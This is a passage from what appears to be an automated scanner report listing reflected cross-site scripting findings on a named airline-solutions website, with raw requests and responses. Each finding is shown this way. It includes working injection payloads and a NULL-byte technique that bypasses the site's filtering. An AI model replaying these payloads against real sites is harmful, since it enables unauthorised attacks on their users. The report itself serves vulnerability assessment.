This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=fuel_management&iframe=truef6401"><a>928de2f5074&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:00:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322566; expires=Thu, 06-Oct-2011 10:00:42 GMT; path=/
Set-Cookie: exp_last_activity=1286377242; expires=Thu, 06-Oct-2011 10:00:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:00:43 GMT
Pragma: no-cache
Content-Length: 2141
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=fuel_management&iframe=truef6401"><a>928de2f5074&width=500&height=500" />
...[SNIP]...

3.91. http://www.sabreairlinesolutions.com/home/includes/form_issues [issue parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the issue request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ad6"><a>c3d3c691540 was submitted in the issue parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=irregular_operations19ad6"><a>c3d3c691540&iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 09:56:22 GMT; path=/
Set-Cookie: exp_last_activity=1286376982; expires=Thu, 06-Oct-2011 09:56:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:56:23 GMT
Pragma: no-cache
Content-Length: 2173
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations19ad6"><a>c3d3c691540&iframe=true&width=500&height=500" />
...[SNIP]...

3.92. http://www.sabreairlinesolutions.com/home/includes/form_issues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ecc8"><script>alert(1)</script>79c91da2525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ecc8"><script>alert(1)</script>79c91da2525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500&%002ecc8"><script>alert(1)</script>79c91da2525=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:29:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 10:29:30 GMT; path=/
Set-Cookie: exp_last_activity=1286378970; expires=Thu, 06-Oct-2011 10:29:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:29:30 GMT
Pragma: no-cache
Content-Length: 2179
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500&%002ecc8"><script>alert(1)</script>79c91da2525=1" />
...[SNIP]...

3.93. http://www.sabreairlinesolutions.com/home/includes/form_issues [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_issues

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3eca"><a>778f54e83ba was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_issues?issue=fuel_management&iframe=true&width=500b3eca"><a>778f54e83ba&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:02:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322566; expires=Thu, 06-Oct-2011 10:02:44 GMT; path=/
Set-Cookie: exp_last_activity=1286377348; expires=Thu, 06-Oct-2011 10:02:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:02:44 GMT
Pragma: no-cache
Content-Length: 2141
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_issues?issue=fuel_management&iframe=true&width=500b3eca"><a>778f54e83ba&height=500" />
...[SNIP]...

3.94. http://www.sabreairlinesolutions.com/home/includes/form_suites [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ec7"><a>1395fc53d3 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500a3ec7"><a>1395fc53d3 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:21:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:21:00 GMT; path=/
Set-Cookie: exp_last_activity=1286378460; expires=Thu, 06-Oct-2011 10:21:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:21:01 GMT
Pragma: no-cache
Content-Length: 2151
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500a3ec7"><a>1395fc53d3" />
...[SNIP]...

3.95. http://www.sabreairlinesolutions.com/home/includes/form_suites [iframe parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81e8"><a>c3993814117 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=truea81e8"><a>c3993814117&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:15:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:15:33 GMT; path=/
Set-Cookie: exp_last_activity=1286378133; expires=Thu, 06-Oct-2011 10:15:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:15:33 GMT
Pragma: no-cache
Content-Length: 2152
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=truea81e8"><a>c3993814117&width=500&height=500" />
...[SNIP]...

3.96. http://www.sabreairlinesolutions.com/home/includes/form_suites [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f18b"><script>alert(1)</script>589c7a48f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f18b"><script>alert(1)</script>589c7a48f61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500&%002f18b"><script>alert(1)</script>589c7a48f61=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:40:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:40:58 GMT; path=/
Set-Cookie: exp_last_activity=1286379657; expires=Thu, 06-Oct-2011 10:40:58 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:40:58 GMT
Pragma: no-cache
Content-Length: 2180
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500&%002f18b"><script>alert(1)</script>589c7a48f61=1" />
...[SNIP]...

3.97. http://www.sabreairlinesolutions.com/home/includes/form_suites [suite parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the suite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8748e"><a>3f2efd2f839 was submitted in the suite parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations8748e"><a>3f2efd2f839&iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:12:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:12:08 GMT; path=/
Set-Cookie: exp_last_activity=1286377928; expires=Thu, 06-Oct-2011 10:12:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:12:09 GMT
Pragma: no-cache
Content-Length: 2174
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations8748e"><a>3f2efd2f839&iframe=true&width=500&height=500" />
...[SNIP]...

3.98. http://www.sabreairlinesolutions.com/home/includes/form_suites [width parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_suites

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f32"><a>5557ac528ce was submitted in the width parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=50022f32"><a>5557ac528ce&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
